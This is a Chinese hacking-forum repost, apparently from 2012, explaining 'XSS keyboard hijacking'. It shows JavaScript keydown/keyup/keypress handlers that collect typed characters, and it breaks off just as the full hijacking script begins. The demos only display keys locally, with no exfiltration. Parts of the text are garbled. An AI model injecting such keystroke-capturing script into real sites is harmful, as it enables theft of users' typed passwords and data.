黑色星空
欢迎你,注册进来让我们共同打造这片星空吧。。。。。。

by: niusan521

Join the forum, it's quick and easy

黑色星空
欢迎你,注册进来让我们共同打造这片星空吧。。。。。。

by: niusan521
黑色星空
Would you like to react to this message? Create an account in a few clicks or log in to continue.
黑色星空

嘘!天黑了,我们慢慢的出现了、、、、


Xss高级技巧劫持键盘

黑色星空 :: 黑色星空 :: 网络攻防(行千里路,读万卷书) :: 攻防转载

向下

Xss高级技巧劫持键盘 Empty Xss高级技巧劫持键盘

帖子  niusan521 周三 三月 07, 2012 6:53 pm

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意 攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性这里是我们自己的交流平台,!今天就来说说这个劫持键盘怎 么怎么实现的这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台!7Js里面的最主要的就是这几个按键事件
当用户按下键盘按键时触发。
当用户按下字面键时触发。
onkeyup 当用户释放键盘按键时触发。
Onkeydown 和onkeyup 获取的都是大写的 几乎所有的字符串都是可以获取的
Onkeyoress 获取的是小写 一些打印字符获取不了 例如退格 等等 但是!像这些字符shift+1 他是直接获取!不像onkeydown onkeyup都是获取两个字符的document.onkeydown = keydown;像这样子随便在键盘上按一个键都会触发这一个函数其他的也是一样的我们还需要考虑一下浏览器 不同的浏览器 获取的对象都是不一样的
Ie的话我们用 event.keyCode;像火狐的的就要
; U9 q3 `” M4 N. u” w Z加一个参数然后要用的which对象属性view sourceprint?1 function keydown(x){
2 var keycode=x.which;
3 }
4 Document.onkeydown=keydown;
因为获取都是键盘数 (keycode)所以呢还需要用 String.fromCharCode进行转换
下面是ie的是三个键盘事件的代码view sourceprint?01 <HTML>
02 <HEAD><TITLE>onkeypress</TITLE>
03
04 </HEAD>
05 <BODY>
06 <script type=”text/javascript”>
07 var aaa=”";
08 var bbb=”";
09 function onkeypress() {
10       var keycode = event.keyCode;
11       var realkey = String.fromCharCode(event.keyCode);
12 aaa+=realkey;
13 bbb+=keycode;
14      document.getElementById(“sb”).innerHTML=aaa;
15 document.getElementById(“eb”).innerHTML=bbb;
16    }
17    document.onkeypress = onkeypress;
18 </script>
19 <div id=”sb”></div>
20 <hr>
21 <div id=”eb”></div>
22 </BODY>
23 </HTML>
view sourceprint?01 <HTML>
02 <HEAD><TITLE>keydown</TITLE>
03
04 </HEAD>
05 <BODY>
06 <script type=”text/javascript”>
07 var aaa=”";
08 var bbb=”";
09 function keydown() {
10       var keycode = event.keyCode;
11       var realkey = String.fromCharCode(event.keyCode);
12 aaa+=realkey;
13 bbb+=keycode;
14      document.getElementById(“sb”).innerHTML=aaa;
15 document.getElementById(“eb”).innerHTML=bbb;
16    }
17    document.onkeydown =keydown;
18 </script>
19 <div id=”sb”></div>
20 <hr>
21 <div id=”eb”></div>
22 </BODY>
23 </HTML>
view sourceprint?01 <HTML>
02 <HEAD><TITLE>keyup</TITLE>
03
04 </HEAD>
05 <BODY>
06 <script type=”text/javascript”>
07 var aaa=”";
08 var bbb=”";
09 function keyup() {
10       var keycode = event.keyCode;
11       var realkey = String.fromCharCode(event.keyCode);
12 aaa+=realkey;
13 bbb+=keycode;
14      document.getElementById(“sb”).innerHTML=aaa;
15 document.getElementById(“eb”).innerHTML=bbb;
16    }
17    document.onkeyup =keyup;
18 </script>
19 <div id=”sb”></div>
20 <hr>
21 <div id=”eb”></div>
22 </BODY>
23 </HTML>
根据他们的不同..相互互补完成了这一样一个脚本 能看懂的就看下把 功能差不多归功于onkeypress onkeypress获取不到都用keydown来获取view sourceprint<HTML>
02 <HEAD><TITLE>js劫持键盘代码by Darkmoon</TITLE>
niusan521
niusan521

帖子数 : 210
注册日期 : 12-01-09

返回页首 向下

返回页首

黑色星空 :: 黑色星空 :: 网络攻防(行千里路,读万卷书) :: 攻防转载

 
您在这个论坛的权限:
不能在这个论坛回复主题